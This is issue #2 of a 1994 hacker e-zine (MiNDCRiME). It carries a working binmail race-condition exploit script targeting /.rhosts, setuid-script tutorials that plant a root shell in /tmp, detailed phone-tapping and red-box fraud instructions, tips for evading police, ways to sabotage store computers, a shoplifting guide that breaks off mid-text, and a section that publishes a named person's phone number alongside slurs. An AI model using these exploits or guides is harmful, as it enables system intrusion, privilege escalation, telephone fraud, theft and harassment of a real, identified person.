Copy Link
Add to Bookmark
Report
Mindcrime_Issue_02
# # # # ###### ##### ###### # # #######
## ## # ## # # # # # # # # ## ## #
# # # # # # # # # # # # # # # # # # #
# # # # # # # # # # ###### # # # # #####
# # # # # # # # # # # # # # #
# # # # ## # # # # # # # # # #
# # # # # ###### ##### # # # # # #######
- - - - - ------ ----- - - - - - -------
- - - - -- - - - - - - - - - -
- - - - - - - - - - - - - - -
- - - - - - - - - - ----- - - - - -----
- - - - - - - - - - - - - - - - - - -
-- -- - -- - - - - - - - - -- -- -
- - - - ------ ----- ----- - - -------
Issue #2
"Holy fux, Batman!"
Dec 1, 1994
=================================[MiNDCRiME]==================================
MiNDCRiME Magazine is protected under Copywright laws of the United States
and Europe. No portion of this work may be duplicated without the expressed
permission of the editor. MiNDCRiME Magazine may be distributed freely
as long as the distributed copy is unaltered. Use of MiNDCRiME within any
corporation whether private or government is subjected to a fee. E-Mail
mndcrime@m-net.arbornet.org for information on commercial license.
=================================[MiNDCRiME]==================================
[Table Of Contents]
File #1:
b. Article submission information.
c. About articles that appear in MiNDCRiME.
d. EDiTORiAL: IRC thoughts by h0wcum. (continued)
File #2: Sendmail: the latest exploit by zomo.
File #3: Beginner's Guide to Hacking continues with setuid stuff from
zomo.
File #4: MiNDCRiME's Official Emmy Awards.
File #5: eASE dROPPING aND cARDS by iP
File #6: How to Mess up Department Store Macs By C-D and Walrus
File #7: Phreaking, a Beginner's Guide by WyreTapp.
File #8: Stealing Comic Books by kid Eternity
File #9: Getting Even: the sequel your momma warned you about.
b: Supplimental Toolz: Fake Mail + News
File #10: News Flash: Hacker gets 20-month sentence. Courtesy Rerror.
File #11: New sendmail hole?
================================[MiNDCRiME]================================
Introduction
Welcome to iSSUE #2 of MiNDCRiME. Things are rolling now, we are
a little late with this issue because some of our authors are late
sending in their articles. The initial reaction to MiNDCRiME has been
mixed. There are people who say it rox, and there are ppl who say it sux.
Nevertheless, I have been highly sought after since publishing the first
issue.
MiNDCRiME is:
h0wcum : editor
Valgamon: assistant editor. (welcome aboard!)
iP : global co-ordinator.
oJ : Staff dude
Digital : Staff dude
So here is the second issue. I hope everyone gets a little
something from it. Enjoy and don't get caught.
================================[MiNDCRiME]================================
Submission Information
If you would like to submit an article, email the article as well as your
handle to: mndcrime@cyberspace.net. All submissions are subjected to
editing and rejection. We are currently looking for articles on:
Easy systems,
Hacker's sites, BBSs and FTP sites on the net.
Unix hacking tutorials, src codes, bugs, shell scripts, etc.
Recent information on Kevin Mitnick.
Unix and general computer jokes.
World hacking and phreaking news.
Use your imagination.
Direct all comments and questions to the address noted above.
Direct all flames to /dev/null or my anus, whichever floats your boat.
==================================[MiNDCRiME]===============================
About Article Submission
Some people have pulled me aside on IRC to tell me they thought
certain submitted articles in issue #1 were lame. I'd just like to point
out that the people who write for us put a bit of effort into their work
and it isn't fair to shoot them down so quickly. I'd also like to add
that if you hotshots think you can do better, you are *more* than welcome
to submit an article.
Remember, next time it could be you they are saying wrote a lame
article. We try hard, Valgamon and I to put out the best magazine that we
can. You can take your attitudes and put them where the sun don't shine.
If you have some constructive criticism to offer, we will be happy to
hear it, but if you want to cop an attitude with us, you can eat me.
================================[MiNDCRiME]===============================
Thoughts on IRC
by h0wcum
As you all know #hack is +i. I'd like to start off this message
saying that I intend no disrespect to any of those who have chosen to
make #hack invite only. This is merely my opinion, which is shared by
many, even those who choose not to gripe openly about it.
For quite some time #hack has had its doors open to all who wished
to enter. That was the essence of the channel. The only time I have known
#hack to be invite only is when the channel has been taken over, and it
it appears now that it has been taken over for the final time, on a more
permanent basis.
No one person, or small group of people own #hack. No one has the
right to make the channel invite only: it's like inviting or refusing
quests to someone elses' house. You have no right to make #hack +i. It's
*not* yours. The decision to make #hack +i was brought about by
one individual and supported by others. It is, however, contested by
many, some of which who are ops, who have tried to make #hack -i and
ended up in a +i <--> -i war with len.
Let's forget for a moment that you have absolutley *no fucking*
right to make any permanent descisions on the channel. Let's forget that you
have to be re-opped evertime you join #hack and that #hack does not
automattically role out the red carpet and op you when you join. Let's
examine, if you will, the inconvenience factor.
I usually get invited to #hack, that is, when ops are awake. Getting
into the channel at night or even at 8am is another story. Check it:
<-[len]-> invite #hack
*** len is away: ask mark ][ceman or loki or y or loq
<-[mark]-> invite #hack
*** Mark is away: Doing evil thigns to evil things
<-[][ceman]-> invite #hack
<-[y]-> invite #Hack
*** y: No such nick/channel
<-[loq]-> invite #hack
*** loq is away: ZZzzzZZZ...msg len loki ragent gentry for invite
<-[ragent]-> invite #hack
*** ragent: No such nick/channel
<-[gentry]-> invite #hack
*** gentry: No such nick/channel
<-[loki]-> inite #Hack
.... or my personally favorite circular reference:
<-[len]-> invite
*** len is away: ask mark
<-[mark]-> invite
*** Mark is away: ask len
As you can see, one has to fuck around for a time just
to get an invite. You end up in a big circle of invite /msg's
just to get into a channel that should be allowed in with no
hassle.
This is rediculous. I emplore those who are holding
#hack hostage to take a fucking step back and realizee that
you have exactly *squats* worth of authority to make it +i,
especially when there are so many against it. len, you don't
own #hack, I don't know who you are, but in all my time on
#hack, I've just started to see you around in the last few
months, unless you went by another nick.
I don't wanna blow sunshine up anyone's ass, but I'd
like to open this to a vote. If you are a non-op on #hack, send
e-mail to our address and explain your position on this. Also, I am
not trying to blow sunshine up anyone's ass, but this shit has got to end.
==================================[MiNDCRiME]===============================
=================================[MiNDCRiME]==================================
[FiLE #2:]
[Here's the latest binmail script. I don't know how many of you have it,
but here it is. This is courtesy of zomo. ]
From zomo@narqlinq.net23.com Sat Oct 8 10:28:21 1994
Date: Sat, 8 Oct 1994 10:01:48 -0500
From: zomo@narqlinq.net23.com
#!/bin/sh
#
# This exploits a flaw in Ultrix/SunOS binmail(1), and attempts
# to embarrass the admin, by creating an motd entry.
#
# Written 1994 by Nate Lawson <nlawson@galaxy.calpoly.edu>
# Minor Revisions by Chris Ellwood <cellwood@gauss.calpoly.edu>
# Thanks go to 8lgm for the basic script format.
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
PROG="`basename $0`"
ME="`whoami`"
PWENT="`hostname` `whoami`"
cat > race.c << 'EOF'
#define TARGET "/.rhosts"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main( ac,av) int ac; char **av;
{
unsigned int pid,bpid; /* Some machines don't have pid_t */
int i;
char target[13];
strcpy (target,"/tmp/maa");
/* General format for binmail temp names */
if ((pid = fork())==0) {
sleep (2);
nice (19); /* Increase our chances and ... */
execl ("/bin/mail","mail",0); /* Fork binmail */
}
bpid=pid; /* back up our pid for a later time */
for (i=11;i>=8;i--) {
target[i]=(pid%10) + '0';
/* Make the name for the tempfile */
pid /= 10;
}
while (!symlink(TARGET,target)) unlink (target);
/* Point that mktemp()'d file to the pot of gold */
while (symlink(TARGET,target)) unlink (target);
/* Probably not necessary, but what the heck */
kill(bpid,1); /* Clean up, don't want to lag the system */
}
EOF
cc -O -s -o race race.c
# Check we now have race
if [ ! -x "race" ]; then
echo "$PROG: couldnt compile race.c - lame!"
exit 1
fi
OLD_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
NEW_TARGET_LEN=$OLD_TARGET_LEN
cp /usr/spool/mail/$ME /tmp/$$ # Backup the mail spool.. we need it
cp /dev/null /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
echo $PWENT >> /usr/spool/mail/$ME
echo "" >> /usr/spool/mail/$ME
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
./race &
RACE_PID=$!
sleep 4
NEW_TARGET_LEN=`ls -ld $TARGET_FILE |awk -F' ' '{print $4}'` 2>/dev/null
kill -9 $RACE_PID
done
# We won the race
echo "Succeeded.."
# Add back our spool.. don't want to lose our mail.
cp /dev/null /usr/spool/$ME
cp /tmp/$$ /usr/spool/mail/$ME
rm -f /tmp/$$ race race.c
exit 0
=================================[MiNDCRiME]==================================
=================================[MiNDCRiME]==================================
[FiLE #3:]
[I'd like to remind folks that this is the "Beginner's" section. Most of
you will know this. I don't need to hear colorful remarks about
how "old" this is. -hc]
"Why shell scripts with the set-user-id bit set aren't safe?"
by zomo
Most shells will run as a login shell if the first character of their
argv[0] starts with a '-'. This is how login manages to give you a login
shell (check login.c). It calls csh as '-csh'. One of the things that a
login shell does is read your .profile or .cshrc.
On some systems, the shell is stupid enough to read and run $HOME/.profile
(or equivalent) even if it is running set-uid (effective uid != real uid).
So,
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script
% cat > .profile << _EOF_
cp /bin/sh /tmp/fuck
chown root.wheel /tmp/fuck
chmod 4755 /tmp/fuck
_EOF_
% ln -s /usr/local/bin/setuid-shell-script -gotcha
% ./-gotcha
% /tmp/fuck
#
You got it! And there is another easy-to-exploit bug with set-uid shell
script.
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script
% ln -s /usr/local/bin/setuid-shell-script -i
% ./-i
#
Try it and think how it works (or it doesn't work ;) ).
Now for the second security hole. It works on almost all #! systems.
Not only with shell scripts. When the kernel execs a file, it looks for
a magic number in the first two bytes ( try % man a.out ). If the magic
number is '#!', then it takes the next one or two tokens, execs file
into which token parsed, with the full pathname of the script as an
argument. ( get the kernel source of BSD unix and check exec.c )
So if /user/crash/dummies starts with:
#!/bin/sh
then the kernel, in the process of loading this, would do:
execute "/bin/sh /user/crash/dummies". In other words, /bin/sh would
have /user/crash/dummies as argv[0]. If it was
#!/bin/csh -f
then the kernel would execs "/bin/csh -f /user/crash/dummies"
The important thing to note here is that the shell re-opens the file
fo itself. The kernel does not pass an open file descripter to shell.
The race condition arises here.
% ls -l /usr/local/bin/setuid-shell-script
-rwsr-xr-x 1 root 51763 Nov 16 1993 setuid-shell-script
% ln -s /usr/local/bin/setuid-shell-script hack-link
% cat > hack-commands << _EOF_
cp /bin/sh /tmp/fuck
chown root.wheel /tmp/fuck
chmod 4755 /tmp/fuck
_EOF_
% ./hack-link
So the kernel stat()s hack-link. stat() follows the link and see the
set-uid bit set with setuid-shell-script and the owner being root. So
the kernel sets uid to root (check exec.c, you can find this routine).
Then it executes the following command:
/bin/sh /user/danny/hack-link
with uid set to 0.
The uid-zero shell opens /user/danny/hack-link. The open() follows the
link and opens the file at the other end (/usr/local/bin/setuid-shell-script)
and executes the commands from it. Still no security hole.
But what if while the kernel was doing this, you did:
% rm mylink; ln -s /user/danny/hack-commands /usr/danny/hack-link
Now when the kernel followed hack-link,
it found /usr/local/bin/setuid-shell-script. So it set uid to 0. But the
time the /bin/sh follwed hack-link to open it, it find it was linked to
hack-commands, not /usr/local/bin/setuid-shell-script. So it execute
hack-commands as root.
Now you will almost certainly not win such a race with the kernel.
But you can increase the probability of win a race by increasing
system load (i.e. execute X application, compute complex math problem)
and doing race with fast and optimized C program.
The moral of story: DO NOT SET-UID ANY SCRIPTS.
================================[MiNDCRiME]================================
[FiLE #4:]
MiNDCRiME Presents:
Asshole of the Month
The Official Anus Emmy
Presented to: blootin
Runner's up: Solctice, heretic, b1tchez.
[Pretty soon, Solctice will be like Whitney, snagging
all the awards..]
================================[MiNDCRiME]================================
_____ _____
|_ _| Roses are red, |_ _|
n (O O) n Violets are blue, n (O O) n
H _|\_/|_ H You fuxed with me, j00 H _|\_/|_ H
nHnn/ \___/ \nnHn So fux yew, times 2!! nHnn/ \___/ \nnHn
<V VV / VV V> <V VV / VV V>
\__\/| |\/__/ \__\/| |\/__/
================================[MiNDCRiME]================================
MiNDCRiME Presents:
Narq of the Year
The Official Trust Me Not Emmy
Presented to: Skipjack
Runners up: pX (email me for his inpho)
Hark! I am a narq!
Of stark nature and poise,
I lurch silently amongst the noise.
Your info, haveth I
Dick size, hair color and cbi
Watch me, j00, I am a spy!
When u fux up, you will hear,
Skipjack narqed you out, sweet and dear.
Fux with me not,
For I shall narq,
Destroy your family, will I do
Just for fuxing with me on IRC, j00.
================================[MiNDCRiME]================================
MiNDCRiME Presents:
Fag of the Century
The Official Buttfuck.Com Emmy
Presented To: Solctice
Runners up: no one, he won by a long shot.
I don't even know where to begin. Why don't you call him yourself:
Jim Reinknecht (Solctice) 908-832-6633
[I know it's lame, but considering the numberous times he
put my info up on irc... Merry Christmas, fucker.]
================================[MiNDCRiME]================================
================================[MiNDCRiME]================================
[FiLE #5:]
eASE dROPPING aND cARDS
y---[MiNDCRiME #2!]---y
aRTICLE tYPED bY iP?!
_ _ _____ 12.o4.94 ]____ _ _
Every now and then, those of us who take the time to be
observant stumble across something remarkable. Let me
relate to you one of those experiences.
It was an all too lazy sunny afternoon in Indiana. I
was bored, and I decided to listen to my Realistic
PRO-2004 scanner. I flipped it on and scanned through
the usual federal government, military aviation, and
cordless phone frequencies, but there was no action to
be found. I happened to come across some scrambled DEA
transmissions and a droning cordless phone conversation
by some neighbors I could not identify. So for a
change I decided to scan through the marine radio
channels. The scanner then stopped on marine radio
channel 26, which is used to ship-to-shore telephone
calls. A man was reading off his calling card number
to the operator, who gladly accepted and connected his
call. Calling card numbers over the airwaves! I was
shocked -- astonished that such a lack of security
could not only exist, but be accepted practice.
I began mointoring marine telephone to find out more,
and it turns our that using a calling card for billing
is commonplace on VHF marine radiotelephone. People use
calling cards for billing all the time. That's what
the are for. But is it that big of a deal? [k0d3z!]
You bet it is. Marine telephone uses two frequencies,
one for the ship and one for the shore station.
[obviously]
The shore station transmits both sides of the
conversation at a some-what considerable power, enough
to offer reliable communications up to 50 miles
offshore. Anyone with a standard police type scanner
costing as little as $100 can listen in. People using
marine radiotelephonecan be broadcasting their calling
card number to a potential audience of thousands.
[k0d3z] And that just shouldn't be happening, but it
is. [I won't complain] And there is no doubt that
calling card fraud is occurring because of this lack of
security.
From the phone compant's [many Bell and non-Bell
companies provide marine telephone service] point of
view it must be a trade-off for customer convenience.
You see, there just aren't that many ways to bill a
ship-to-shore call. Most calls are collect, a few are
billed to the ship if they have an account, and a few
go to third party numbers [hehe] or other special
accounts. .. Sometimes the operators have trouble
verifying billing information. I monitored one man,
who after racking-up $40 worth of AT&T charges was
informed that they couldn't accept his international
account number. The operator finally coaxed him into
giving a address for billing. Calls are often billed
to third party numbers with verification [hmm], but
calling cards make billing easy for both the customer
and the phone company involved. It would also be
tricky for a company to not allow calling card use
[very tricky]. Doing so would be a inconvenience to
customers and would force them to admit a lack of
communications security. Of course people using marine
radio should already realize that their conversations
aren't private, but announcing the fact wouldn't help
the phone compant at all. In fact, people may place
less calls.
The convenience offered by calling cards makes them an
easy target for fraud. They can be used by anyone from
any phone and with a variety of different long distance
carriers via 10XXX numbers. No red of blue box
hardware necessary here, just 14 digits, but of course,
the number won't be valid for long after all those
strange charges start showing up on someone's bill. It
should be noted that when a calling cafd is used, the
number called, time and date of call, and location [and
often, the number] from which the call was placed are
printed on the bill. A fraudulent user could be caught
via that information if they were careless. Also, some
long distance companies may contact the owner of the
card if they notice and unusually high number of
charges on the card. .. Long distance companies bear
with the brunt of the bills caused by calling card
fraud. However, if you read the fine print, the cards
offered by many companies have a certain minimum amount
that the customer must pay, say $25 or $50. [I have yet
heard of a case where a phone compant got away with
charging a customer when the only thing stolen was a
number and not the card itself] .. So, whats the moral
of the story? Simple. Be damn careful what you say
over any radio, and that included cordless and cellular
telephones.
Also, be careful about how sloppy you are when using
cards. If you are using a calling card, enter it with
touch tones. =) If you happen to make VHF marine
radiotelephone calls, bill collect or charge to your
phone number as you would to a third party number --
without the last four calling card digits. For the most
part radio communications are easy to intercept, and
keeping them secure is up to you. Then again, it gives
hackers and phreakers the cutting edge, and I must say
no one is in any situation to bitch or complain.
================================[MiNDCRiME]================================
[File #6:]
[This is sortof an example of what NOT to send us. I posted this
because the author was kind enough to send it and because it's kinda
funny. In the future, folkx, please only send h/p related files. -hc]
How to mess up department store Macs
By C-D and Walrus
Messing up department store Macs is a fun a wholesome activity
that can be enjoyed by the whole family. Some of these might
be to complicated to do in a store without people getting suspicious,
but they are fun anyways. Here's some favorites!
* Make a copy of the system folder, leave it next to the other system
folder. This will screw up the system, and to boot you will need
a system disk.
* Make tons of copies of all the extensions in the extension folder.
This makes the startup a very slow one, and could cause conflicts
* Bring a modified system and finder from home. You should have
edited it with ResEdit, for example make the "Are you sure you
want to empty the trash?" dialog into something like "The gamma
correction buffer on this monitor has failed, please step away
from the monitor and seek help from a qualified technician".
* Get a startup pict <note it must be a perfect fit of the screen>
of a dialog box saying "Are you sure you wish to purge your ROM?
This process is irreversible" and have the cancel button grayed out.
A couple more you could try:
* Switch the empty and bulging Trash icons, so that the trash looks
empty when it contains files, and bulges when empties.
* Edit the balloon Help text strings (most of the are in easy-to-access
STR# resources so that pointing to a window's Close box produces
a help balloon that says "click this box will cause
irreparable damage to the motherboard"
* Edit the MENU resource to turn a separator line in a menu into an
alluring new menu command (like "Double Processing Speed") that
doesn't work.
* Use ResEdits MENU editor to change all text in menus to white,
rendering the commands completely invisible. (they still work,
you just can't see them)
* Replace the standard alert box icon with the System Bomb icon.
* Re-map the keyboard so that pressing any key produces a semi-colon.
* Change the names of an applications menus, so that the File
menu contain the Format commands and vice-versa
* Install a desktop pattern consisting entirely of Trash can icons, and
then hide the trash in the pattern.
* Create a startup screen that features a realistic System bomb message,
urging the user to restart the Mac immediately.
* Switch the trash and hard drive icons, give them each others names. So
much fun to watch them trash the whole hard drive.
* To crak At-Ease, simply hit the programmers switch and type G FINDER .
This will quit At-Ease and return you to the finder for your hours of
wholesome fun. If you don't have a programmers button, you can also
try command power <the key in the upper right corner> which might
or might not work.
* If you really want to down the Mac, make some files in teach text
(about3-5). Name them all .sony . Put one on the desktop, one in
the first HD window, one in the System folder. If you have any left,
sprinkle them gingerly through the System folder. Restart, and the
Mac will attempt to use the files as Hard Drive Drivers. This can
completely corrupt the hard drive, its tons of fun.
* Unplug and plug back in the ADB cables, this makes all the ADB devices
work very oddly.
* Randomly unplug cables, and plug them back into other sockets. Its
great to see the expressions on sales peoples faces.
* Switch the keyboard type in the control panels, this will mess up
everything you type.
* Take an old disk and bend the metal sliding cover thing a bit out. Put
the disk in, and then try to eject it, if it came out bend the
metal more and put it in again. This works like an arrow or fishhook,
it goes in but does not come out.
* Push the restart button, and then repeatedly push the programmer
button while the startup sound is playing, then leave the computer
sitting with the sad Mac.
* Remove the monitor cable just a bit, so that everything appears green,
or red, or purple=8Apsychedelic!
* Name the finder 'finderL' Restart and run away, watch as dumbfounded
salespeople open the case to make sure the HD is really there.
* Make all the icons that are root folders invisible , and name
them with=spaces. Watch the clerks go nuts!
If you want to get in touch with us, we are C-D and Walrus on IRC,
have phun... :)
================================[MiNDCRiME]================================
==== Phreaking, a Begginers Guide
==== By: WyreTapp
==== Nov 25th, 1994
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Disclaimer: Every phile needs on of these. :( I, Bud Wieser, and the
contributors of this document are not responsible for any
damages caused by the use of it. In no way do we condone
or encourage (hehe) you, the reader, to put this information
into practice.
Intro.
-=-=-=-=-=
Lame ass right?? Well FUCK YOU! There have been tons of philes
written on boxing, but I felt like writing one too. Its a good way to learn
how to write, and you seem to remember everything quicker. So, im gonna
share my experiences with you readers, so that you too may cope with the
crude and harsh remarks from the city-boyz on the net. Have fun, and enjoy.
All of this HAS BEEN DONE AND WORKS IN MY AREA. I will not include a bunch
of theoretical BS that MAY work- only the real thing for the real peoplz.
Whats phreaking??
-=-=-=-=-=
Good question. Its the abuse of a phone system. It usually involves
stealing from the phone company, or a person; resulting in lotsa phun.
There are many branches of phreaking, with many sub-levels. You
will probably find that you cannot do everything in your area. This is
mainly because of new security features installed, and the wide-spread use
of the Digital Switching System. You may want to phreak just for phun,
or, you may want to hack some local place without getting caught. For
whatever reason, it never hurts to know. :)
Sounds phun- what do I do?
-=-=-=-=-=
This is REALLY easy. The first thing your going to want to do is
build yourself a tool known as a BEIGE BOX. This is probably the MOST
usefull tool around (the Red Box MIGHT be in your area). Before I go into
any depth, I will tell you how to make one
You need
----------
1 piece of phone cord (with a plug on each end)
A set of wire cutters
2 Alligator Clips (Of diffrent colors)
Assembly
----------
1) Grab phone cord in left hand.
2) Grab wire cutters in right hand.
3) Cut off the plug on one end of the phone cord.
4) Attach the alligator clips to the RED and GREEN wires.
(May be BLUE and WHITE)
5) Pour beer on cat.
There ya go, a Beige box. It should look something like this.
>-. ________________________,---.
---> `====`------------------------;___| <--- Plug (Jack)
Clips >-' ^Phone cord
If you can't figure this out, stop reading, get a LONG peice of
rope, make a noose, tie it too a friends car, stick your head in, and tell
your friend to step on the gas.
Now what- You got yourself this phone cord with alligator clips
on one end. What will you do with it?? Read on.
Get a phone. The best kind is a hand-set that requires no base.
These are much eaiser to store, and can be connected/disconnected with great
ease. Plug the JACK end of the Beige Box into the phone. You now have
a linemans handset.
Where to use.
-=-=-=-=-=
The next step is too find a place to use your new toy. Go outside
and walk down the street. See those telephone poles? If you dont, then you
got yourself an under-ground wire. These can be very difficult, or very
easy. Look around for a man hole that has your telco's initials on it.
The man-hole will be slightly bigger than the others around it. After you
have found it read on too the "Canning" section.
If you do see telephone poles, try following them. Remember that
the lower wires are CABLE and TELEPHONE. The power lines SHOULD have an
insulator (a piece of ceramic) holding them away from the pole, so you should
be able to tell.
Follow the lines until you see wires running off into someones house.
Follow the line RIGHT into their yard. Check and see if it goes into their
roof. If it does, then keep moving: If it goes down the side of their house
you just found yourself a "spot". Most likely, you will find a Grey
colored box, about 4"x4"x2". Locate it, and push UP on it, to slide it
off. Once you get it off, it should look similar to this (it may have
4 prongs which means it has may have 2 linez)
,-------------------.
| |
| Bolts |
| | |
| __ <-'-> __ |
| | | | | |
| `--'--. ,--`--' |
`--------|`'|-------'
| | <-- Main wire.
` `
Attach the RED alligator clip (from the RED wire of the phone cord)
onto the LEFT bolt, and the GREEN clip onto the RIGHT bolt. You SHOULD
get a dial tone. If you dont, then reverse the clips.
If the box has more than one set of bolts, attach the clips to the
bolts that are on the same horizontal plane (Ie: Two top, or two bottom bolts
not one top and one bottom) Confuse you yet??? You'll figure it out.
It is likely that you will find one of these on a phone pole. If you
do, get ready for some fun, because that is probably a test line owned by
the phone company. You can make all the calls you want, and never have to
worry about someone else picking up the line.
Sometimes, on apartments, you will find a silver box about a foot
long. There are SHINY METAL (Not grey plastic). You can open it by sliding
it to the right. It will unlatch and spring open, revealing a staggered
arangment of bolts, OR prongs. It will look something like this.
,------CASING-----------------.
| |
| __ |
| | | |
| ,---`--' <--- Bolts |
| | __ |
____.' | | |
Main Wire-> ____'-------------- `--' |
| `. |
| `.__ __ |
\|/ | | \|/
These can be a little tricky, because most of the time all of the
prongs arnt used, and the telco guys are lazy. Just keep trying combo's
until you get a tone. You would think that you would just stagger your
way down, BUT Ive only seen ONE that was done like that. :(
They are found often near the top of telephone poles. It isnt
really a good idea to go up there, because if someone catches you, you have
no where to run. Even if you live in the sticks, SOME COP is gonna drive by
and ask you what your doing (Trust me.. :(
Green Cans
-=-=-=-=-=
After you get the hang of those (they are your LAST resort), keep
following that phone line. Eventually, you SHOUD come to a place where
that BIG line (on the phone poles) goes down into some pipes on the side
of the pole and underground. THIS IS WHAT YOU ARE LOOKING FOR! Look around
for another place like this CLOSE by. If you find it, somewhere around your
area is a "Mother Load" or "Green Can". It may be underground. As mentioned
before, look around for the man hole with the Telco's initials on it.
The mother load is usually a grey-green in color, though I have seen
grey ones. They look ALOT like swing-open filing cabinets.
Now, get out your 7/16" wrench (Good thing you read the WHOLE text
file before you went out) and twist the bolts on the silver hands
counter-clockwise (There are arrows printed on the silver handle).
Got it open? Awesome 'eh? (Yes, Im Canadian) All those wires,
those white plastic bars, those wierd looking toolz hanging off the side
of the doors, the instructions on how to use them... Yes, the
instructions. Read them. Write down any phone numbers written down on the
inside of the can.
Look for a regular phone jack. They are USUALLY test lines. A
source of worry-free amusement. If one exists, use it. Why bill someone
some money when you can do it too your telco.
If there is no phone jack your going to have to use one of the tools.
Use the one on the left. It looks really fuqing wierd. Now randomly pick
out a plastice bar, and open it. There should be tabs you press to have it
flip open. You just opened a terminal. look at it terminal closely.
You should be able to see bits of bare wire if you look at the slits on the
top of it. When you find one that has the wire in it, plug in the test tool.
There are two little spikes that fit into hole on the FRONT (not the top) of
the terminal, and you can slide the latch of the tool of the face of the
terminal and hook it onto the back.
Attach your beige box two the bolts at the base of the tool. If you
dont get a dial tone, swith the alligator clips. If still no tone, try
another bank on the terminal.
Before you go phreak-happy, GRAB THE WIRE. There should be a spool
of wire somewhere in the can, usually resting in its own little stand.
TAKE IT. It is VERY VERY usefull.
General tips beige boxing.
-=-=-=-=-=
This is what I want to stress. How NOT to get caught.
Here are a few rules you should follow:
---------------------------------------
1. Do everything suspicious late at night
2. Keep away from noisy dogs
3. Keep away from hot spots (lotsa cops)
4. Keep away from party zones
5. Keep quite
You should be sure to wear a lighter colored shirt underneath
a darker colored shit. That way, if you DO get seen, you can whip off
the dark shit, and appear to be a diffrent person.
Remember that spool of wire you got? Well, try running your
connections away from civilization (across the road and down the ditch).
I ran over 400 meters of wire into the woods once, and had no connection
problems. Be sure to watch out for cutting the line, and shorts (if you must
strip the wire in more than one spot)
To make your life easier, try getting some heavey-duty clips with
wires hanging from them and a clip on the other end. You can attach these
to your connection, so you can clip on without opening anything up later,
and disconnect without having to go back to the site (just yank).
If you get stopped by the police (on a routine stop), try and
be REALLY polite. Answer any questions the guy may have UNLESS it starts
getting to the "I know Im caught" point. Lie about your name of course.
If you are carrying a bag and he asks to see whats in it, SHOW him, but dont
take anything out of the bag. Just open it so he can look in. If he says
something like "Would you come with me?", say "Sure.." and when he turns
around RUN!!! (A good reason NOT to drive directly to your site).
Here is a little list of things you should get if your going to
get into phreaking.
WyreTapps List o' Stuff
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. A friend. Its always funner if u got a friend with you.
2. Pliers, Wire cutters, 7/16" wrench, flash-light and a knife
all attacked to a rope or something- so you dont have to dig
for them.
3. A back-pack.
4. A spool of wire (the 300meter phone stuff from the can)
5. A spool of little wire (for loose connections and tying)
6. Extra alligator clips
7. 4 Industrial strength clips with wires attached (you will find
a use.)
8. A hand-scanner (to scan the police channels. Its nice to know
if you've been caught early.)
9. Walkie-Talkies. Nothing expensive. Just so you can communicate
with your friend (ie: setting up a connection and a cop comes.
Your friend is 200 meters away, and cant yell or you'll both
get seen.)
10. A binder, with paper and a pen attached to it. Really nice to
have.
Red Boxing
-=-=-=-=-=
A red box is something that plays the quarter sound. Whenever
you drop a quarter into a pay-phone, it makes a series of beeps which
signals a quarter has been dropped in. (There are dime and nickle sounds 2)
You can make this sound without the quarter. :) But, alas- Most
telco's are smart and buy NEW payphones that have the ground check. When
a coin is dropped into the phone, it grounds it so that the pay-phone knows
you dropped money in.
Before I tell you how to by-pass the ground test, heres how to make
a red box, the EASY way.
Get one of those halmark greeting cards, or talking pictures, or
record-your-greeting christmas ornaments and record the tone
into it.
How do you get the tone?? HAHAHA. Remember your beige box?
Look around the pay-phone for one of those little grey boxes or a phone-jack.
Plug your beige box in, and drop a quarter into the pay phone. The tone
will be played through your phone REALLY loud and clear. Just record this
into your aparatus.
Another way of doing the tone without a redbox, is to use your
beige box as mentioned above, and put the ear-piece to the mouth-piece of
another payphone.
To bypass the ground check, just drop a nickle into the slot
(which may sometimes be enough for local calls- no red-box needed), OR:
Look at the mouth-piece. Alot of holes in it. Is there
a hole in the direct middle?? If so, drive a tack into it, and run a piece
of wire from the tack to the hook (the thing that holds the phone up when
you hang it up). Hang-up the phone for about 2 seconds, and that will
ground the phone so you can play your tones into your beige box, with a
grounded phone. :)
Sometime you can just ground the phone to make local calls, but Ive
only seen one phone that'll do that (in an OLD dorm).
Conclusion
-=-=-=-=-=
I was hopeing on writing some stuff on Calling Cards, how to
setup a teleconfrence (just dial 0 and ask for help) and Voice Message
systems but I think this article is long enough for now. I ny next
article I will discuss the above and after that I will go into Unix Hacking.
Greetz to: Z0rpHix, Tonyhawk, Endlisnis, Wildman, QwikSilver, Dark and
jUIcE.
================================[MiNDCRiME]================================
[File #8:]
[This is an example of what NOT to send. The article is nice, but it
doesn't go with h/p. In the future please only send h/p related articles
to us. Unless u have a really unusual how-to, send only h/p. -hc]
______________________________
|[][][][][][][][][][][][][][][]|
|[] []|
|[] /\ []|
|[] \ []|
|[] \TEALING COMIC BOOKS []|
|[] \/ []|
|[] []|
|[][][][][][][][]][[][][][][][]|
================================ by: kid Eternity
For those of you who collect comic books, you probably know
that it can be an expensive hobby. For those of you who don't collect
comic books, trust me. Even if you don't collect comics, this file may
be of some use to you. Comic books, like basball cards, can be(come)
very valuable; so you could acquire and sell comic books, or give them
away to friends, relatives, etc. Also, to those of you who don't collect,
I suggest you start- its damn fun. There are comics for everyone.
===-
First, you'll need a place to steal comics from. This could
be a local bookstore or a supermarket with a comic book stand. But,
the Best place would be either a comic bookstore, or a comic book
convention.
In a place like a bookstore or a supermarket, you could
hide the comic book(s) inside on another, in another book or magazine,
or just take it. When I say 'just take it', i mean discretely, like
hiding it or something. Stick it under you shirt/jacket, whatever.
The best way is to roll the comic book (gently!!! if you bend it,
it may not be worth shit!) a little, then stick your hand and forearm
through it, then put your sleeve over that. That may seem a little
complicated, but I've found it to be the best/most discreet way.
Or you could always walk out of the store it.
Many times people won't even think that you are stealing it.
If they do, just say that you bought it somewhere else. If you are
going to say that, you may want to bring along a bag from a comic
bookstore plus make up a fake receipt on your home calculator(on that
you can print up numbers and shit on), or you COULD do it with your
computer/printer. If you bring along the bag, you'll probably get
away with taking more stuff.
STORES & CONVENTIONS
Comic book stores and conventions are sometimes better to steal
